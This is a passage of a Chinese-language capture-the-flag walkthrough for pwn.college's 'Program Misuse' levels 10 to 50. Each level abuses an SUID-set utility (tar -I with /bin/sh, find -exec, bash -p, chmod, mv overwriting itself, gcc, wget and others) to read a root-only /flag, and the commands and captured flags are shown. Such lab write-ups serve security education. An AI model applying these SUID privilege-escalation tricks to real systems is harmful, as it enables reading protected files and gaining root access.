<h3 id="level10"><a href="#level10" class="headerlink" title="level10"></a>level10</h3><p><code>rev</code>存在SUID</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ tldr rev     </span><br><span class="line"></span><br><span class="line">rev</span><br><span class="line"></span><br><span class="line">Reverse a line of text.</span><br><span class="line">More information: &lt;https://manned.org/rev&gt;.</span><br><span class="line"></span><br><span class="line">- Reverse the text string <span class="string">&quot;hello&quot;</span>:</span><br><span class="line">    <span class="built_in">echo</span> <span class="string">&quot;hello&quot;</span> | rev</span><br><span class="line"></span><br><span class="line">- Reverse an entire file and <span class="built_in">print</span> to `stdout`:</span><br><span class="line">    rev path/to/file</span><br></pre></td></tr></table></figure>

<p>solver</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-10:/challenge$ rev /flag|rev</span><br><span class="line">pwn.college&#123;kaA5gNSjQNxSYlHIf1yccF4uPvi.QXyUTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level11"><a href="#level11" class="headerlink" title="level11"></a>level11</h3><p><code>od</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">- Display file <span class="keyword">in</span> hexadecimal format along with its character representation, and <span class="keyword">do</span> not <span class="built_in">print</span> byte offsets:</span><br><span class="line">    <span class="built_in">od</span> --format=xz --address-radix=n -v path/to/file</span><br></pre></td></tr></table></figure>

<p>solver</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-11:/challenge$ <span class="built_in">od</span> --format=xz /flag</span><br><span class="line">0000000 2e6e7770 6c6c6f63 7b656765 68306c6f  &gt;pwn.college&#123;ol0h&lt;</span><br><span class="line">0000020 46797942 74367330 38744c4b 644b6c32  &gt;ByyF0s6tKLt82lKd&lt;</span><br><span class="line">0000040 39576d4a 2e6a4362 557a5851 4d734d54  &gt;JmW9bCj.QXzUTMsM&lt;</span><br><span class="line">0000060 59304d6a 0a7d577a                    &gt;jM0YzW&#125;.&lt;</span><br><span class="line">0000070</span><br></pre></td></tr></table></figure>

<h3 id="level12"><a href="#level12" class="headerlink" title="level12"></a>level12</h3><p><code>hd</code></p>
<p>hexdump</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-12:/challenge$ hd /flag</span><br><span class="line">00000000  70 77 6e 2e 63 6f 6c 6c  65 67 65 7b 55 4b 51 75  |pwn.college&#123;UKQu|</span><br><span class="line">00000010  51 59 73 72 72 73 41 64  63 58 33 68 64 30 4e 59  |QYsrrsAdcX3hd0NY|</span><br><span class="line">00000020  36 51 70 66 67 78 78 2e  51 58 30 55 54 4d 73 4d  |6Qpfgxx.QX0UTMsM|</span><br><span class="line">00000030  6a 4d 30 59 7a 57 7d 0a                           |jM0YzW&#125;.|</span><br><span class="line">00000038</span><br></pre></td></tr></table></figure>

<h3 id="level13"><a href="#level13" class="headerlink" title="level13"></a>level13</h3><p><code>xxd</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">xxd - make a hexdump or <span class="keyword">do</span> the reverse.</span><br><span class="line"></span><br><span class="line">hacker@program-misuse-level-13:/challenge$ xxd /flag</span><br><span class="line">00000000: 7077 6e2e 636f 6c6c 6567 657b 7739 5053  pwn.college&#123;w9PS</span><br><span class="line">00000010: 5270 4f39 6b31 4c45 676a 4e57 2d32 557a  RpO9k1LEgjNW-2Uz</span><br><span class="line">00000020: 636f 4257 4250 672e 5158 3155 544d 734d  coBWBPg.QX1UTMsM</span><br><span class="line">00000030: 6a4d 3059 7a57 7d0a                      jM0YzW&#125;.</span><br></pre></td></tr></table></figure>

<h3 id="level14"><a href="#level14" class="headerlink" title="level14"></a>level14</h3><p><code>base32</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-14:/challenge$ <span class="built_in">base32</span> /flag|<span class="built_in">base32</span> -d</span><br><span class="line">pwn.college&#123;IztaWIFfEpIFApOKp1KboAp2hrM.QX2UTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level15"><a href="#level15" class="headerlink" title="level15"></a>level15</h3><p><code>base64</code></p>
<h3 id="level16"><a href="#level16" class="headerlink" title="level16"></a>level16</h3><p><code>split</code></p>
<p>Split a file into pieces.</p>
<h3 id="level17"><a href="#level17" class="headerlink" title="level17"></a>level17</h3><p><code>gzip</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-17:/challenge$ gzip -f /flag -t</span><br><span class="line">pwn.college&#123;A2xThFDPKdTwUdsxzCdIlvBVeNG.QX5UTMsMjM0YzW&#125;</span><br><span class="line">hacker@program-misuse-level-17:/challenge$ gzip -ft /flag </span><br><span class="line">pwn.college&#123;A2xThFDPKdTwUdsxzCdIlvBVeNG.QX5UTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<p>来自<code>gtfobins</code>的解决方案不是很理解</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># -c 将输出定向至stdout，然后通过pipline进行解压即可</span></span><br><span class="line">hacker@program-misuse-level-17:/challenge$ gzip -c /flag |gzip -d</span><br><span class="line">pwn.college&#123;A2xThFDPKdTwUdsxzCdIlvBVeNG.QX5UTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level18"><a href="#level18" class="headerlink" title="level18"></a>level18</h3><p><code>bzip2</code></p>
<p>同上</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-18:/challenge$ bzip2 -c /flag |bzip2 -d</span><br><span class="line">pwn.college&#123;g5m3zLlz9OJj_N5LqbO0GEiFqBq.QXwYTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level19"><a href="#level19" class="headerlink" title="level19"></a>level19</h3><p><code>zip</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-19:/challenge$ zip /tmp/zip.zip /flag </span><br><span class="line">  adding: flag (stored 0%)</span><br><span class="line">hacker@program-misuse-level-19:/challenge$ <span class="built_in">ls</span> /tmp/zip.zip </span><br><span class="line">/tmp/zip.zip</span><br><span class="line"><span class="comment"># -p stdout</span></span><br><span class="line">hacker@program-misuse-level-19:/challenge$ unzip -p /tmp/zip.zip </span><br><span class="line">pwn.college&#123;oTRHxqxh8ECb2F7lgwEkr2MBQTS.QXxYTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level20"><a href="#level20" class="headerlink" title="level20"></a>level20</h3><p><code>tar</code></p>
<p>首先压缩</p>
<p>之后有多种方式查看</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-20:/challenge$ tar xf /tmp/flag.tar -I <span class="string">&#x27;/bin/sh -c &quot;cat 1&gt;&amp;2&quot;&#x27;</span></span><br><span class="line">flag0000400000000000000000000000007014541167023010376 0ustar  rootrootpwn.college&#123;M6hhTI65Tn8UW4CbRnTPYh6QdCy.QXyYTMsMjM0YzW&#125;</span><br><span class="line">hacker@program-misuse-level-20:/challenge$ strings /tmp/flag.tar </span><br><span class="line">flag</span><br><span class="line">0000400</span><br><span class="line">0000000</span><br><span class="line">0000000</span><br><span class="line">00000000070</span><br><span class="line">14541167023</span><br><span class="line">010376</span><br><span class="line">ustar  </span><br><span class="line">root</span><br><span class="line">root</span><br><span class="line">pwn.college&#123;M6hhTI65Tn8UW4CbRnTPYh6QdCy.QXyYTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level21"><a href="#level21" class="headerlink" title="level21"></a>level21</h3><p><code>ar</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-21:/challenge$ ar -q /tmp/flag.ar /flag</span><br><span class="line">ar: creating /tmp/flag.ar</span><br><span class="line"><span class="comment"># stdout</span></span><br><span class="line">hacker@program-misuse-level-21:/challenge$ ar -p /tmp/flag.ar </span><br><span class="line">pwn.college&#123;M0tyRZFm73meJQOdBg_8HrVeWiO.QXzYTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level22"><a href="#level22" class="headerlink" title="level22"></a>level22</h3><p><code>cpio</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 从标准输入获取文件路径</span></span><br><span class="line">hacker@program-misuse~level22:/challenge$ <span class="built_in">echo</span> <span class="string">&quot;/flag&quot;</span> | cpio -o &gt; /tmp/flag.cpio</span><br><span class="line">1 block</span><br><span class="line">hacker@program-misuse~level22:/challenge$ <span class="built_in">cat</span> /tmp/flag.cpio</span><br><span class="line">▒q▒▒▒▒&lt;f:&gt;8/flagpwn.college&#123;YUbrJquqgrpKOtaXXjb0LdJQ7nJ.QX0YTMsMjM0YzW&#125;</span><br><span class="line">▒q</span><br><span class="line">  TRAILER!!!hacker@program-misuse~level22:/challenge$ <span class="built_in">ls</span> -l /tmp/flag.cpio</span><br><span class="line">-rw-r--r-- 1 hacker hacker 512 May  9 03:10 /tmp/flag.cpio</span><br></pre></td></tr></table></figure>

<h3 id="level23"><a href="#level23" class="headerlink" title="level23"></a>level23</h3><p><code>genisoimage</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ tldr genisoimage</span><br><span class="line">genisoimage</span><br><span class="line">Pre-mastering program to generate ISO9660/Joliet/HFS hybrid filesystems.More information: https://manpages.debian.org/latest/genisoimage/genisoimage.1.en.html.</span><br><span class="line"></span><br><span class="line"> - Create an ISO image from the given <span class="built_in">source</span> directory:</span><br><span class="line">   genisoimage -o &#123;&#123;myimage.iso&#125;&#125; &#123;&#123;path/to/source_directory&#125;&#125;</span><br><span class="line"></span><br><span class="line"> - Create an ISO image with files larger than 2GiB by reporting a smaller apparent size <span class="keyword">for</span> ISO9660 filesystems:</span><br><span class="line">   genisoimage -o -allow-limited-size &#123;&#123;myimage.iso&#125;&#125; &#123;&#123;path/to/source_directory&#125;&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># -sort参数，后面的格式保存</span></span><br><span class="line">hacker@program-misuse~level23:/challenge$ genisoimage -<span class="built_in">sort</span> /flag</span><br><span class="line">genisoimage: Incorrect <span class="built_in">sort</span> file format</span><br><span class="line">        pwn.college&#123;Q3IL0ywFgp-NaQwrHJePZCDB-f_.QX1YTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level24"><a href="#level24" class="headerlink" title="level24"></a>level24</h3><p><code>env</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level24:/challenge$ <span class="built_in">env</span> /bin/cat /flag</span><br><span class="line">pwn.college&#123;UX62MXi7PtgjH3IDHsLKpIG_EOo.QX2YTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level25"><a href="#level25" class="headerlink" title="level25"></a>level25</h3><p><code>find</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level25:/challenge$ find /flag -<span class="built_in">exec</span> <span class="built_in">cat</span> &#123;&#125; \;</span><br><span class="line">pwn.college&#123;cA_GztAR-usYvdgjqEokj-fYjyD.QX3YTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level26"><a href="#level26" class="headerlink" title="level26"></a>level26</h3><p><code>make</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level26:~/mydir$ vim Makefile</span><br><span class="line">hacker@program-misuse~level26:~/mydir$ <span class="built_in">ls</span></span><br><span class="line">Makefile</span><br><span class="line">hacker@program-misuse~level26:~/mydir$ make all</span><br><span class="line"><span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;sj1QGv-HIvPw-DAg9GmQmLhD0WD.QX4YTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level27"><a href="#level27" class="headerlink" title="level27"></a>level27</h3><p><code>nice</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 调整调度优先级</span></span><br><span class="line">hacker@program-misuse~level27:/challenge$ <span class="built_in">nice</span> <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;gE1rgK0NOdocRQuWbCggcfj8cL_.QX5YTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level28"><a href="#level28" class="headerlink" title="level28"></a>level28</h3><p><code>timeout</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level28:/challenge$ <span class="built_in">timeout</span> 2s <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;M2atqgNLfC_nKGpoK33lSy5wt_l.QXwcTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level29"><a href="#level29" class="headerlink" title="level29"></a>level29</h3><p><code>stdbuf</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ tldr <span class="built_in">stdbuf</span></span><br><span class="line"><span class="built_in">stdbuf</span></span><br><span class="line">Run a <span class="built_in">command</span> with modified buffering operations <span class="keyword">for</span> its standard streams.More information: https://www.gnu.org/software/coreutils/stdbuf.</span><br><span class="line"></span><br><span class="line"> - Change stdin buffer size to 512 KiB:</span><br><span class="line">   <span class="built_in">stdbuf</span> --input=&#123;&#123;512K&#125;&#125; &#123;&#123;<span class="built_in">command</span>&#125;&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment"># 行缓冲</span></span><br><span class="line">hacker@program-misuse~level29:/challenge$ <span class="built_in">stdbuf</span> -oL <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;4qHl_KQ1QsSAYu_soKf8VS7nJJn.QXxcTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level30"><a href="#level30" class="headerlink" title="level30"></a>level30</h3><p><code>setarch</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level30:/challenge$ setarch x86_64 <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;I73iIPJkEw62qLohQ-2TMzjt9IG.QXycTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level31"><a href="#level31" class="headerlink" title="level31"></a>level31</h3><p><code>watch</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ tldr watch</span><br><span class="line">watch</span><br><span class="line">Execute a program periodically, showing output fullscreen.More information: https://manned.org/watch.</span><br><span class="line"></span><br><span class="line"> - Repeatedly run a <span class="built_in">command</span> and show the result:</span><br><span class="line">   watch &#123;&#123;<span class="built_in">command</span>&#125;&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Every 2.0s: <span class="built_in">cat</span> /flag                                                                                     program-misuse~level31: Thu May  9 06:12:52 2024</span><br><span class="line"></span><br><span class="line">watch -x <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;QImYC_KdKDGjLk-mhD222WUgsCt.QXzcTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level32"><a href="#level32" class="headerlink" title="level32"></a>level32</h3><p><code>socat</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">socat EXEC:<span class="string">&#x27;COMMAND&#x27;</span>,pty,ctty,setsid</span><br></pre></td></tr></table></figure>

<p><img src="/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/image-20240509142058672.png" alt="image-20240509142058672"></p>
<h3 id="level33"><a href="#level33" class="headerlink" title="level33"></a>level33</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-33:/challenge$ ./babysuid_level33 </span><br><span class="line">Welcome to ./babysuid_level33!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line">will require some light programming to <span class="built_in">read</span> the flag..</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/whiptail.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level33) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/whiptail!</span><br></pre></td></tr></table></figure>

<p><code>whiptail</code>命令不常使用，文本对话框</p>
<p><img src="/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-15-42-07-image.png"></p>
<p><img src="/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-15-40-33-image.png"></p>
<h3 id="level34"><a href="#level34" class="headerlink" title="level34"></a>level34</h3><p><code>awk</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-34:/challenge$ awk <span class="string">&#x27;&#123;print&#125;&#x27;</span> /flag</span><br><span class="line">pwn.college&#123;0x4I7MlhzCb0UEQc78Er5q-O9WF.QX2cTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level35"><a href="#level35" class="headerlink" title="level35"></a>level35</h3><p><code>sed</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-35:/challenge$ sed -n <span class="string">&#x27;1,$p&#x27;</span> /flag </span><br><span class="line">pwn.college&#123;85i7pHL8RJEJWPSrQzEYiQ_dFlK.QX3cTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level36"><a href="#level36" class="headerlink" title="level36"></a>level36</h3><p><code>ed</code>一个古老的editor</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-36:/challenge$ ed /flag</span><br><span class="line">56</span><br><span class="line"><span class="comment"># 从第1行至最后一行执行p动作</span></span><br><span class="line">1,<span class="variable">$p</span></span><br><span class="line">pwn.college&#123;AU1YLd99_YyB6YQ84nib0zoUwly.QX4cTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level37"><a href="#level37" class="headerlink" title="level37"></a>level37</h3><p><code>chown</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level37:/challenge$ <span class="built_in">chown</span> hacker:hacker /flag</span><br><span class="line">hacker@program-misuse~level37:/challenge$ <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;EKQ_cQ7YdByDyM81rl3zcAOaA5o.QX5cTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level38"><a href="#level38" class="headerlink" title="level38"></a>level38</h3><p><code>chmod</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level38:/challenge$ <span class="built_in">chmod</span> 777 /flag</span><br><span class="line">hacker@program-misuse~level38:/challenge$ <span class="built_in">cat</span> /flag</span><br><span class="line">pwn.college&#123;wEQYcCuvRf9pAOt_1q_TvfXC-t4.QXwgTMsMjM0YzW&#125;</span><br><span class="line">hacker@program-misuse~level38:/challenge$ <span class="built_in">ls</span> -l /flag</span><br><span class="line">-rwxrwxrwx 1 root root 56 May  9 06:25 /flag</span><br></pre></td></tr></table></figure>

<h3 id="level39"><a href="#level39" class="headerlink" title="level39"></a>level39</h3><p><code>cp</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level39:/challenge$ <span class="built_in">cp</span> /flag /dev/stdout</span><br><span class="line">pwn.college&#123;AcVh2BzdU5CPREhv__zTmQJdXr_.QXxgTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level40"><a href="#level40" class="headerlink" title="level40"></a>level40</h3><p><code>mv</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 利用mv获取其他可执行命令</span></span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">ls</span> -l /usr/bin/mv</span><br><span class="line">-rwxr-xr-x 1 root root 149888 Sep  5  2019 /usr/bin/mv</span><br><span class="line">hacker@program-misuse~level40:/challenge$ ./babysuid_level40</span><br><span class="line">Welcome to ./babysuid_level40!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line"><span class="built_in">let</span> you get the flag by doing tricks with permissions.</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/mv.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level40) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/mv!</span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">ls</span> -l /usr/bin/mv</span><br><span class="line">-rwsr-xr-x 1 root root 149888 Sep  5  2019 /usr/bin/mv</span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">mv</span> /bin/ca</span><br><span class="line">cal                cancel             captoinfo          cargo              catchsegv          cautious-launcher</span><br><span class="line">calendar           capinfos           captype            <span class="built_in">cat</span>                catman</span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">mv</span> /bin/cat /usr/bin/mv</span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">ls</span> -l /usr/bin/mv</span><br><span class="line">-rwxr-xr-x 1 root root 43416 Sep  5  2019 /usr/bin/mv</span><br><span class="line">hacker@program-misuse~level40:/challenge$ ./babysuid_level40</span><br><span class="line">Welcome to ./babysuid_level40!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line"><span class="built_in">let</span> you get the flag by doing tricks with permissions.</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/mv.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level40) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/mv!</span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">ls</span> -l /usr/bin/mv</span><br><span class="line">-rwsr-xr-x 1 root root 43416 Sep  5  2019 /usr/bin/mv</span><br><span class="line">hacker@program-misuse~level40:/challenge$ <span class="built_in">mv</span> /flag</span><br><span class="line">pwn.college&#123;Mb_hc47lN2uv7IF_LH9Mxn0o7b6.QXygTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level41"><a href="#level41" class="headerlink" title="level41"></a>level41</h3><p><code>perl</code></p>
<p>读取文件脚本</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level41:/challenge$ perl ~/mydir/test.pl</span><br><span class="line">pwn.college&#123;0hnijmy454W3pZhtnOnyJUV4TDy.QXzgTMsMjM0YzW&#125;</span><br><span class="line"></span><br><span class="line">hacker@program-misuse~level41:/challenge$ <span class="built_in">cat</span> ~/mydir/test.pl</span><br><span class="line">open(my <span class="variable">$fh</span>, <span class="string">&#x27;&lt;&#x27;</span>, <span class="string">&#x27;/flag&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (my <span class="variable">$line</span> = &lt;<span class="variable">$fh</span>&gt;) &#123;</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;<span class="variable">$line</span>\n&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">close(<span class="variable">$fh</span>);</span><br></pre></td></tr></table></figure>

<h3 id="level42"><a href="#level42" class="headerlink" title="level42"></a>level42</h3><p><code>python</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level42:/challenge$ python ~/mydir/test.py</span><br><span class="line">pwn.college&#123;0iGaALyKJBc_0P3FwnjPWe3PT43.QX0gTMsMjM0YzW&#125;</span><br><span class="line"></span><br><span class="line">hacker@program-misuse~level42:/challenge$ <span class="built_in">cat</span> ~/mydir/test.p</span><br><span class="line"><span class="built_in">cat</span>: /home/hacker/mydir/test.p: No such file or directory</span><br><span class="line">hacker@program-misuse~level42:/challenge$ <span class="built_in">cat</span> ~/mydir/test.py</span><br><span class="line">with open(<span class="string">&quot;/flag&quot;</span>, <span class="string">&quot;r&quot;</span>) as f:</span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> f:</span><br><span class="line">        <span class="built_in">print</span>(line)</span><br></pre></td></tr></table></figure>

<h3 id="level43"><a href="#level43" class="headerlink" title="level43"></a>level43</h3><p><code>ruby</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level43:/challenge$ ruby ~/mydir/test.rb</span><br><span class="line">pwn.college&#123;wMOOwXZHiXOFFVG6840JslsJ_Gh.QX1gTMsMjM0YzW&#125;</span><br><span class="line">hacker@program-misuse~level43:/challenge$ <span class="built_in">cat</span> ~/mydir/test.rb</span><br><span class="line">File.open(<span class="string">&#x27;/flag&#x27;</span>, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">do</span> |file|</span><br><span class="line">    file.each_line <span class="keyword">do</span> |line|</span><br><span class="line">      puts line</span><br><span class="line">    end</span><br><span class="line">end</span><br></pre></td></tr></table></figure>

<h3 id="level44"><a href="#level44" class="headerlink" title="level44"></a>level44</h3><p><code>bash</code></p>
<p>默认会降权，添加<code>-p</code>参数</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level44:/challenge$ bash -p -c <span class="string">&quot;cat /flag&quot;</span></span><br><span class="line">pwn.college&#123;U7o1W0s3R5dAwSGWJt033jFAEdu.QX2gTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level45"><a href="#level45" class="headerlink" title="level45"></a>level45</h3><p><code>date</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level45:/challenge$ <span class="built_in">date</span> -f /flag</span><br><span class="line"><span class="built_in">date</span>: invalid <span class="built_in">date</span> ‘pwn.college&#123;c3GD-fMXUDz4v4B8KlGJEo83jAA.QX3gTMsMjM0YzW&#125;’</span><br></pre></td></tr></table></figure>

<h3 id="level46"><a href="#level46" class="headerlink" title="level46"></a>level46</h3><p><code>dmesg</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level46:/challenge$ dmesg --file /flag</span><br><span class="line">[    0.000000] pwn.college&#123;gh9omCo4n_qgI0S5vxoIdXCWTcc.QX4gTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level47"><a href="#level47" class="headerlink" title="level47"></a>level47</h3><p><code>wc</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level47:/challenge$ <span class="built_in">wc</span> --files0-from=/flag</span><br><span class="line"><span class="built_in">wc</span>: <span class="string">&#x27;pwn.college&#123;oiDLBvkfs-E6xfPNgsGygcSx0Q0.QX5gTMsMjM0YzW&#125;&#x27;</span>$<span class="string">&#x27;\n&#x27;</span>: No such file or directory</span><br></pre></td></tr></table></figure>

<h3 id="level48"><a href="#level48" class="headerlink" title="level48"></a>level48</h3><p><code>gcc</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># -x 指定语言为c</span></span><br><span class="line"><span class="comment"># -E 预处理</span></span><br><span class="line">hacker@program-misuse~level48:/challenge$ gcc -x c -E /flag</span><br><span class="line"><span class="comment"># 1 &quot;/flag&quot;</span></span><br><span class="line"><span class="comment"># 1 &quot;&lt;built-in&gt;&quot;</span></span><br><span class="line"><span class="comment"># 1 &quot;&lt;command-line&gt;&quot;</span></span><br><span class="line"><span class="comment"># 31 &quot;&lt;command-line&gt;&quot;</span></span><br><span class="line"><span class="comment"># 1 &quot;/usr/include/stdc-predef.h&quot; 1 3 4</span></span><br><span class="line"><span class="comment"># 32 &quot;&lt;command-line&gt;&quot; 2</span></span><br><span class="line"><span class="comment"># 1 &quot;/flag&quot;</span></span><br><span class="line">pwn.college&#123;MFI4HR57nIzhBD2bG9tRRBczvX7.QXwkTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level49"><a href="#level49" class="headerlink" title="level49"></a>level49</h3><p><code>as</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level49:/challenge$ as /flag</span><br><span class="line">/flag: Assembler messages:</span><br><span class="line">/flag:1: Error: no such instruction: `pwn.college&#123;E1R-0GpfIdJr0YQZQYUsq08Radp.QXxkTMsMjM0YzW&#125;<span class="string">&#x27;</span></span><br></pre></td></tr></table></figure>

<h3 id="level50"><a href="#level50" class="headerlink" title="level50"></a>level50</h3><p><code>wget</code></p>
<ul>
<li>-i参数：将字符全部转为了小写</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse~level50:/challenge$ wget -i /flag</span><br><span class="line">--2024-05-09 11:38:27--  http://pwn.college%7Bo0tqldso04w0g3s8epsxsiqfwu9.qxyktmsmjm0yzw%7D/</span><br><span class="line">Resolving pwn.college&#123;o0tqldso04w0g3s8epsxsiqfwu9.qxyktmsmjm0yzw&#125; (pwn.college&#123;o0tqldso04w0g3s8epsxsiqfwu9.qxyktmsmjm0yzw&#125;)... failed: Name or service not known.</span><br><span class="line">wget: unable to resolve host address ‘pwn.college&#123;o0tqldso04w0g3s8epsxsiqfwu9.qxyktmsmjm0yzw&#125;’</span><br></pre></td></tr></table></figure>

<p>利用文件上传功能：</p>
